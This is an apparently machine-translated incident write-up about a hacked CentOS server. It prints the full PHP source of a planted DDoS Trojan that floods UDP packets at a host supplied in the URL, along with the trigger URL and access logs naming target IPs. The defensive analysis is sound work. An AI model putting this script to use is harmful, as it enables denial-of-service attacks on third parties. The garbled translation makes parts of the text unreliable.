Remember a time when the Centos server was caught by a horse

At 5 am this morning, I received a warning message from dianbao saying that the website M was unavailable. I slept soundly. Besides, the system where the website is located is centos. Important data is backed up every day, so it should be very safe and I don't care about it. He went back to sleep.

At 9 o 'clock in the morning, the person in charge of the machine room called me directly, saying that the network of the whole machine room was extremely slow, and all the websites of the unit could not be opened or opened very slowly. Centos server was hung by a horse once caught a horse experience.

I rushed over and checked the network and found that 175 was always sending out packets at 50M/S, and that 175 was the server where M was located.

Decisively, SSH connects to the 175 server, and finds that the connection of 175 server is also slow. After connecting, top1 is connected. Check the load of cpu:

top

If two apache processes are found occupying more than 40% of cpu1, discontinue httpd service immediately

service httpd stop

After stopping httpd service, look at the network state again, 175 server also does not send out the packet, 1 cut is normal.

Judging from this should be 175 server hung horse, crazy to the outside of the packet, squeezing all the room bandwidth.

The next step is to catch the horse!

175 server has hardware firewall, only open http80 and ssh22 ports, ssh is unlikely to be stolen, should be through the web vulnerability. 5 am just in recruit, Trojan program file should be in 1 day.

Go to the M site root directory, look for files that have changed in the last 1 day, and execute

find ./ -mtime -1

Sure enough, a suspicious file named phzLtoxn.php appeared in the directory listing. Check out the creator of the Trojan and execute it

ls -l phzLtoxn.php

The file is gone when it's found here. Is it going to self-destruct? Centos server was hanging a horse once caught a horse experience

The original occurred a small episode, the next door manager huang also noticed the file, 2 words did not say to delete. I used to criticize and educate xiao huang. See the Trojan program to know delete delete delete! Can't Trojan horse program regenerate into? You have to go with the flow, not with a knife. You have to find the source of the leak! Delete no way, and then open httpd service, invite the Wolf into the room, and so on to see if it can regenerate.

Sure enough, within half an hour, a new phzLtoxn.PHP file was created. After a check, the file was created by apache, so it must have been uploaded through a flaw in the website.

Analyze 1 next Trojan file, look at the hacker intent

The source code of phzLtoxn.php is posted here with simple comments for learning purposes only.

<?php
// Set the script run time 
set_time_limit(999999);
// Attack the target server ip
$host = $_GET['host'];
// Attack the target server port 
$port = $_GET['port'];
// The attack time 
$exec_time = $_GET['time'];
// Number of bytes sent at a time 
$Sendlen = 65535;
$packets = 0;
// Set the client to disconnect without terminating the script 
ignore_user_abort(TRUE);
//step1.  Target server $host , ports, $port , running time $exec_time effectiveness 
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {  
 if (StrLen($_GET['rat']) <> 0) {    
 echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . GetHostByName($_SERVER['SERVER_NAME']) . "|" . php_uname() . "|" . $_SERVER['SERVER_software'] . $_GET['rat'];    
 exit;  
 }  
 echo "Warning to: opening";  
 exit;
}
//step2.  Set the sending string $out, Here is the" AAAAAAAAAA... " 
for ($i = 0; $i < $Sendlen; $i++) {  
 $out .= "A";
}
$max_time = time() + $exec_time;
//step3.  The attack , use udp Send a string to the target server 
while (1) {  
 $packets++;  
 if (time() > $max_time) {    
 break;  
 }  
 $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);  
 if ($fp) {    
 fwrite($fp, $out);    
 fclose($fp);  
 }
}
//step4.  Attack statistics 
echo "Send Host $host:$port<br><br>";
echo "Send Flow $packets * ($Sendlen/1024=" . round($Sendlen / 1024, 2) . ")kb / 1024 = " . round($packets * $Sendlen / 1024 / 1024, 2) . " mb<br><br>";
echo "Send Rate " . round($packets / $exec_time, 2) . " packs/s" . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . " mb/s";
?>

As you can see from the above code, it is a typical ddos attack code. Hackers are supposed to use our server as a dummy, and organize a large number of dummy servers to send packets to the target server crazily. The hacker just needs to open a browser and type in the http: / / M domain name. com / / phzLtoxn.php & # 63; host = x. x. x. x & port = xx & time = xx can ddos attack on the target server.

View the httpd log, analyze the attack on the ip source, and execute

tail /var/log/httpd/access.log | grep phzLtonxn.php
183.12.75.240 - - [10/Aug/2012:10:38:46 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:56 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:58 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:08 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:12 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:28 +0800] "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

It is found that the source ip is from multiple countries, and the target server ip is also from multiple countries. It is a little strange that hackers have targeted attacks, boring hackers.
Next step, find the hole!

1. Re-examined the file permissions under the directory of M station. Only a few necessary cached, static directories have write permissions enabled for apache, preventing the phzLtoxn.php file from being generated again.

2, reopened httpd service, 360 sites were used to detect http: / / webscan. 360. cn/H stand for leak detection, found serious remote execution H station were loopholes, and hurriedly call the patch.

3. After the patch is finished, the passwords of system users, database users, ftp users and M station users are also changed.

After several days of observation, the 1 slice was normal.

Summary 1 below a few safety principles

1. Minimize permissions.

web directory 1 must have permissions, and only write permissions to a few necessary folders for apache.

2. Always pay attention to patch updates.

Often use third party web site safety inspection tools, such as http: / / webscan. 360. cn, also can reference 10 safety assessment tools, if website system USES the 3 commonly used procedures, pay more attention to the information of your 1 dark clouds hole platform http: / / www wooyun. org /.
3, in the recruit after 1 must make up for.

Don't just delete delete delete, to find the source of recruitment, analysis of hackers.

This is still to ask the cattle to analyze 1, why the hackers used so many broilers to attack ddos different servers, but there is no connection between the servers attacked by ddos. Why aren't the attacks targeted? Is it to consume bandwidth to play? !